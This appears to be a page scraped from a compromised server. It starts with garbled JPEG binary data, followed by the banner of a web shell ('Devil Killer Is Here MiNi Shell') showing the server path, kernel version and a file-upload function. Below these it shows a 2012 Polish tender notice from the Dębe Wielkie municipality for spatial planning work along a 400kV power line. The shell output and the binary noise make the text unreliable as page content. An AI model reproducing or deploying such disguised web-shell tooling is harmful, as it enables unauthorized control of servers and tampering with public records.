JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348798-N-2012.html

<p class="kh_header"><b>Dębe Wielkie: Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego w zakresie obejmującym tereny części wsi Kąty Goździejewskie, Walercin, Gorzanka, Dębe Wielkie, Chrośla i Cyganka w Gminie Dębe Wielkie oraz opracowanie projektu miejscowego planu zagospodarowania przestrzennego pod linię 400kV Miłosna - Siedlce - Ujrzanów dla części wsi Kąty Goździejewskie, Walercin i Gorzanka w Gminie Dębe Wielkie.</b><br>
<b>Numer ogłoszenia: 348798 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dębe Wielkie , ul. Strażacka 3, 05-311 Dębe Wielkie, woj. mazowieckie, tel. 025 7564700, faks 025 7564734.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.debewielkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego w zakresie obejmującym tereny części wsi Kąty Goździejewskie, Walercin, Gorzanka, Dębe Wielkie, Chrośla i Cyganka w Gminie Dębe Wielkie oraz opracowanie projektu miejscowego planu zagospodarowania przestrzennego pod linię 400kV Miłosna - Siedlce - Ujrzanów dla części wsi Kąty Goździejewskie, Walercin i Gorzanka w Gminie Dębe Wielkie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1.	Przedmiotem zamówienia jest zadanie polegające na opracowaniu projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Dębe Wielkie w obszarach objętych uchwałą Nr SR.XXIII.0007.157.2012 Rady Gminy Dębe Wielkie z dnia 30 sierpnia 2012 roku oraz opracowanie projektu miejscowego planu zagospodarowania przestrzennego pod linię 400kV Miłosna - Siedlce - Ujrzanów dla części wsi: Kąty Goździejewskie, Walercin, Gorzanka, Gmina Dębe Wielkie w obszarze objętym uchwałą Nr SR.XIX.0007.125.2012 Rady Gminy Dębe Wielkie z dnia 28 marca 2012 roku.
W/w dokumenty (tj. projekt zmiany studium oraz projekt miejscowego planu zagospodarowania przestrzennego) należy opracować według procedur i wytycznych określonych w ustawie z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz. U. z 2012r., poz. 647), a także w zakresie i zgodnie z wytycznymi:
-	Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 roku w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587);
-	Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 roku w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz. 1233);
-	Ustawy z dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 ze zm.), 
oraz ustawach i przepisach odrębnych, odnoszących się do planowania i zagospodarowania przestrzennego oraz na zasadach i w terminie określonym w niniejszej SIWZ.

Obszary opracowania obejmują:
	w zakresie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego:
-	dla części wsi Dębe Wielkie - obszar opracowania obejmuje powierzchnię   ok 10,0 ha;
-	dla części wsi Chrośla - obszar opracowania obejmuje powierzchnię ok 16,3 ha;
-	dla części wsi Cyganka - obszar opracowania obejmuje powierzchnię ok 4,5 ha;
-	dla części wsi Gorzanka - obszar opracowania obejmuje powierzchnię ok 1,8 ha;
-	pod linię 400kV Miłosna - Siedlce - Ujrzanów dla części wsi: Kąty Goździejewskie, Walercin, Gorzanka - obszar opracowania obejmuje powierzchnię ok 58,3 ha;
	w zakresie projektu miejscowego planu zagospodarowania przestrzennego pod linię 400kV Miłosna - Siedlce - Ujrzanów dla części wsi: Kąty Goździejewskie, Walercin, Gorzanka - obszar opracowania obejmuje powierzchnię ok 58,3 ha.
Załączniki nr 7 oraz nr 8 do niniejszego SIWZ stanowią uchwały intencyjne Rady Gminy Dębe Wielkie, w których określono zakres (obszary) będące przedmiotem niniejszego postępowania przetargowego.

Przedmiot zamówienia winien być realizowany dwutorowo tj. należy opracowywać jednocześnie projekt zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projekt miejscowego planu zagospodarowania przestrzennego, przy czym w pierwszej kolejności winna zostać uchwalona zmiana studium.

Zakres projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego obejmuje w szczególności:
1)	prace przygotowawcze, analizę materiałów wejściowych, przygotowanie wykazów wniosków wraz z propozycją ich rozpatrzenia, sporządzenie projektu zmiany studium kierunków uwarunkowań i kierunków zagospodarowania przestrzennego (części tekstowej i graficznej) wraz z prognozą oddziaływania na środowisko;
2)	poprowadzenie procedury formalno - prawnej uchwalenia zmiany studium w tym m.in. przygotowywanie wzorów pism na wszystkich etapach procedury, przygotowanie uchwały wraz z załącznikami oraz wymaganą dokumentacją prac planistycznych;
3)	przeprowadzenie strategicznej oceny oddziaływania na środowisko, o której mowa w art. 46 pkt. 1 ustawy z dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 ze zm.);
4)	przygotowanie projektu zmiany studium do zaopiniowania i lub uzgodnienia przez organy i instytucje zgodnie z art. 11 pkt 5 i 6 ustawy o planowaniu i zagospodarowaniu przestrzennym;
5)	przygotowanie wykazu uzyskanych opinii i uzgodnień do projektu zmiany studium wraz z analizą i propozycją sposobu i zakresu ich uwzględnienia;
6)	wprowadzenie zmian w projekcie zmiany studium oraz prognozie oddziaływania na środowisko wynikających z uzyskanych opinii i dokonanych uzgodnień;
7)	przygotowanie wzorów obwieszczeń i ogłoszeń prasowych zawiadamiających o wyłożeniu studium do publicznego wglądu oraz o terminie dyskusji publicznej;
8)	przygotowanie projektu zmiany studium do wyłożenia do publicznego wglądu;
9)	czynne uczestnictwo Wykonawcy w zorganizowanej publicznej dyskusji nad rozwiązaniami przyjętymi w projekcie zmiany studium wraz z prognozą oddziaływania na środowisko - sporządzenie protokołu z tej dyskusji; a także czynne uczestnictwo w  rozpatrywaniu uwag wniesionych do projektu zmiany studium, pracach komisji i posiedzeniach Rady Gminy Dębe Wielkie;
10)	przygotowanie wykazu uwag wniesionych do projektu zmiany studium wyłożonego do publicznego wglądu wraz z prognozą oddziaływania na środowisko, z propozycją ich rozstrzygnięcia;
11)	przygotowanie projektu uchwały w sprawie zmiany studium wraz z wymaganymi załącznikami;
12)	wykonanie edycji uchwalonej zmiany studium z uwzględnieniem zmian wynikających z autopoprawek lub przegłosowanych poprawek przez Radę Gminy - 2 egzemplarze w  wersji papierowej i cyfrowej należy przekazać Zmawiającemu w ciągu 5 dni od terminu uchwalenia zmiany studium;
13)	skompletowanie, uporządkowanie, oprawienie i przekazanie Zamawiającemu kompletnej dokumentacji prac planistycznych w 2 egzemplarzach w terminie 5 dni od dnia uchwalenia zmiany studium, w tym przygotowanie uzasadnienia i podsumowania do uchwalonego studium, o których mowa w art. 42 pkt 2 oraz art. 55 ust. 3 ustawy z  dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. Nr 199, poz. 1227 ze zm.);
14)	przygotowanie projektu wystąpienia do Wojewody dotyczącego sprawdzenia zgodności z prawem uchwały w sprawie zmiany studium oraz dokumentacji prac planistycznych.
15)	po stwierdzeniu przez organ nadzoru (Wojewodę Mazowieckiego), że uchwała nie narusza obowiązujących przepisów prawnych należy przekazać Zamawiającemu sześć egzemplarzy uchwalonej zmiany studium (uchwałę wraz z załącznikami w wersji papierowej oraz elektronicznej z zapisem na płycie CD). Pliki tekstowe w wersji elektronicznej należy przekazać w standardzie plików .doc i  .pdf, natomiast rysunki studium w plikach cyfrowych w standardzie plików .tif, .jpg oraz pdf. Trzy egzemplarze należy złożyć i oprawić w sztywną okładkę w sposób uniemożliwiający ich dekompletację.

Zakres projektu miejscowego planu zagospodarowania przestrzennego obejmuje w szczególności:
1)	Prace wstępne. Opracowanie koncepcji planu.
a)	pozyskanie na koszt Zamawiającego aktualnych map zasadniczych z warstwicami w skali l:1000 w zakresie niezbędnym do opracowania planu (nie dopuszcza się map katastralnych);
b)	wykonanie opracowania ekofizjograficznego z uwzględnieniem powiązań przyrodniczych z otoczeniem;
c)	zebranie i opracowanie innych materiałów wejściowych do projektowania;
d)	opracowanie wykazu odpowiedzi i stanowisk organów i instytucji określonych ustawą, zawiadomionych o podjęciu uchwały o przystąpieniu do sporządzania planu wraz z ich analizą oraz sposobem rozpatrzenia w przypadku organów opiniujących;
e)	opracowanie graficznej analizy wniosków do planu z przedstawieniem stanu istniejącego i wniosków;
f)	opracowanie wytycznych i wskazań do projektu planu (dyspozycji programowo - przestrzennych i urbanistycznych) - w formie opisowej i graficznej.
2)	Opracowanie projektu planu.
a)	część graficzna planu ma być wykonana w postaci wektorowej bazy danych przestrzennych (GIS), tzn. jako zbiór obiektów posiadających reprezentację geometryczną (punkt, linia, poligon) w układzie współrzędnych zgodnym z przyjętym w PODGiK w Mińsku Mazowieckim wraz z przypisanymi im atrybutami opisowymi;
b)	granice stref funkcjonalno - przestrzennych w planie należy poprowadzić pasem o szerokości 80 metrów pod linię 400kV Miłosna - Siedlce - Ujrzanów;
c)	opracowanie projektu planu przygotowanego do opiniowania i uzgodnień - uchwała + rysunek w wersji papierowej i cyfrowej (mapa w jednym z formatów: ESRI Shape, Map-Info MapTab, GML lub GEO-MAP oraz dodatkowo jako plik pdf) należy określić przeznaczenie, zasady i standardy zagospodarowania terenu według procedur i problematyki określonych w ustawie i rozporządzeniach, oraz wynikające ze sposobu rozpatrzenia wniosków do planu);
d)	uzasadnienie rozwiązań przyjętych w projekcie planu;
e)	sporządzenie prognozy oddziaływania na środowisko w 3 egzemplarzach w wersji papierowej i cyfrowej;
f)	sporządzenie prognozy skutków finansowych w 3 egzemplarzach w wersji papierowej i cyfrowej;
g)	przygotowanie wniosku dotyczącego zgody na przeznaczenie gruntów rolnych i  leśnych na cele nierolnicze i nieleśne w wersji papierowej i cyfrowej w 3 egzemplarzach (o ile taka zgoda jest wymagana);
h)	przygotowanie wzoru wystąpienia o uzgodnienia i opinie do projektu planu - 1 egzemplarz.
3)	Opiniowanie i uzgadnianie planu. Procedura wyłożenia planu.
a)	przygotowanie wykazu uzyskanych opinii i uzgodnień do projektu planu wraz z analizą i propozycją sposobu i zakresu ich uwzględnienia;
b)	przygotowanie ewentualnych zmian w projekcie planu oraz w innych dokumentach (tj. prognozie skutków finansowych, prognozie oddziaływania na środowisko) w wyniku procedury opiniowania i uzgadniania, tylko w przypadku gdy zaistnieje taka potrzeba;
c)	wzory obwieszczeń i ogłoszeń prasowych zawiadamiających o wyłożeniu planu do publicznego wglądu oraz o terminie dyskusji publicznej - 1 komplet;
d)	przeprowadzenie wyłożenia do publicznego wglądu projektu planu wraz z prognozą oddziaływania na środowisko;
e)	udział w zorganizowanej publicznej dyskusji nad rozwiązaniami przyjętymi w projekcie planu - sporządzenie protokołu z tej dyskusji;
f)	przygotowanie wykazu uwag wniesionych do projektu planu wyłożonego do publicznego wglądu wraz z prognozą oddziaływania na środowisko, z propozycją ich rozstrzygnięcia - 1 egzemplarz;
g)	opracowanie fragmentaryczne lub całościowe (odpowiednio do potrzeb) korekty projektu planu (w grafice wyróżniającej naniesione zmiany) i jeżeli zaistnieje potrzeba - odpowiednio: prognozy oddziaływania na środowisko i prognozy skutków finansowych;
h)	przygotowanie projektu wystąpienia o ponowne uzgodnienie (tylko w przypadku gdy zaistnieje taka potrzeba) - 1 komplet;
i)	opracowanie końcowej edycji projektu planu do uchwalenia (tekst ustaleń planu w formie projektu uchwały Rady Gminy oraz części graficznej projektu planu w wersji papierowej i cyfrowej);
j)	przygotowanie listy nieuwzględnionych uwag - 1 egzemplarz;
k)	udział zespołu autorskiego w procedurze uchwalania planu.
4)	Skompletowanie dokumentacji planistycznej. 
a)	wykonanie edycji uchwalonego planu z uwzględnieniem zmian wynikających z autopoprawek lub przegłosowanych poprawek przez Radę Gminy - 2 egzemplarze w wersji papierowej i cyfrowej, który należy przekazać Zmawiającemu w ciągu 5 dni od terminu uchwalenia planu;
b)	skompletowanie i przekazanie dokumentacji planistycznej - 2 egzemplarze kompletnej dokumentacji, które należy przekazać Zmawiającemu w ciągu 5 dni od terminu uchwalenia planu, w tym przygotowanie uzasadnienia i podsumowania do uchwalonego planu, o których mowa w art. 42 pkt 2 oraz art. 55 ust. 3 ustawy z dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 ze zm.);
c)	po stwierdzeniu przez organ nadzoru, że uchwała nie narusza obowiązujących przepisów prawnych przygotowanie uchwały do publikacji (uchwały + rysunki) - w ilości i formie wymaganej przez Wojewodę.
5)	Przekazanie Zamawiającemu uchwalonego planu miejscowego (uchwała + rysunek) w następującej formie:
a)	mapy w formie analogowej (wydruk) w skali 1:1000 należy przekazać w sześciu kolorowych egzemplarzach. Trzy egzemplarze należy złożyć i oprawić w sztywną okładkę w sposób uniemożliwiający ich dekompletację;
b)	zgodnie z ustaleniami w/w pkt 2) lit. a) część graficzna planu utworzona jest w postaci wektorowej bazy danych przestrzennych (GIS), tzn. jako zbiór obiektów posiadających reprezentację geometryczną (punkt, linia, poligon) w układzie współrzędnych zgodnym z przyjętym w PODGiK w Mińsku Mazowieckim wraz z przypisanymi im atrybutami opisowymi. Mapy należy przekazać w jednym z formatów: ESRI Shape, Map-Info MapTab, GML lub GEO-MAP oraz dodatkowo w formacie pdf;
c)	opracowania w zakresie kartograficznym, o którym mowa powyżej należy wykonać stosując odpowiednie oznaczenia graficzne i literowe, oznaczenia graficzne barwne i jednobarwne wg wymagań Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 roku w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164, poz. 1587) oraz Polskiej Normy PN-B-01027 z dnia 11 lipca 2002 roku;
d)	tekst planu w formie uchwały Rady Gminy należy przekazać w sześciu egzemplarzach w wersji papierowej oraz w formie plików tekstowych możliwych do edycji (np.doc).
2.	Wszelkie prace projektowe lub czynności nie opisane wyżej, a wynikające z procedur określonych w ustawie z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz. U. z 2012r., poz. 647) oraz przepisach odrębnych, niezbędne do właściwego i kompletnego opracowania projektu zmiany studium oraz miejscowego planu zagospodarowania przestrzennego należy traktować jako oczywiste i uwzględnić w kosztach i terminie wykonania przedmiotu zamówienia. 
3.	Wykonawca przedłoży Radzie Gminy Dębe Wielkie projekty uchwał zmiany studium oraz miejscowego planu zagospodarowania przestrzennego wraz z niezbędnymi załącznikami do dnia 29 marca 2013 roku.
4.	Ustala się następujący termin realizacji przedmiotu zamówienia:
Zamawiający  wymaga,  aby  zamówienie  było  zrealizowane  w  terminie  do  dnia  28 czerwca 2013 roku, przy czym w tym terminie niezbędne jest stwierdzenie przez organ nadzoru (Wojewodę Mazowieckiego), że uchwały nie naruszają obowiązujących przepisów prawnych. 
5.	Cena oferty ma charakter ryczałtowy - obejmuje wykonanie całości przedmiotu zamówienia. Wynagrodzenie wypłacone zostanie po przekazaniu Zamawiającemu uchwalonych dokumentów (zmiany studium oraz miejscowego planu zagospodarowania przestrzennego) oraz stwierdzeniu przez organ nadzoru (Wojewodę Mazowieckiego), że uchwały nie naruszają obowiązujących przepisów prawnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do zamówienia podstawowego, zgodnie z art. 67. ust.1 pkt. 6 ustawy Pzp w zakresie obejmującym przedmiot zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku i  za jego spełnienie uzna złożenie oświadczenia, o spełnianiu warunków udziału w postępowaniu (zgodnie ze wzorem załącznika nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca powinien wykazać wykonanie z należytą starannością co najmniej dwóch usług polegających na opracowaniu projektów studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektów miejscowych planów zagospodarowania przestrzennego, przy czym każda z wykonanych usług - opracowania studium oraz planu winna obejmować powierzchnię co najmniej 50 ha. Zamawiający na tych zasadach dopuści również wykazanie przez Wykonawcę usług związanych z opracowaniem projektów zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektów zmiany miejscowych planów zagospodarowania przestrzennego (zgodnie ze wzorem załącznika nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobą, której powierzone zostanie kierowanie pracami, posiadającą uprawnienia architektoniczne lub urbanistyczne i przynależy do właściwej okręgowej izby architektów i urbanistów.
W celu wykazania spełniania tego warunku, Wykonawca powinien załączyć oświadczenie na druku stanowiącym załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobą, której powierzone zostanie kierowanie pracami, posiadającą uprawnienia architektoniczne lub urbanistyczne i przynależy do właściwej okręgowej izby architektów i urbanistów.
W celu wykazania spełniania tego warunku, Wykonawca powinien załączyć oświadczenie na druku stanowiącym załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku i  za jego spełnienie uzna złożenie oświadczenia, o spełnianiu warunków udziału w postępowaniu (zgodnie ze wzorem załącznika nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

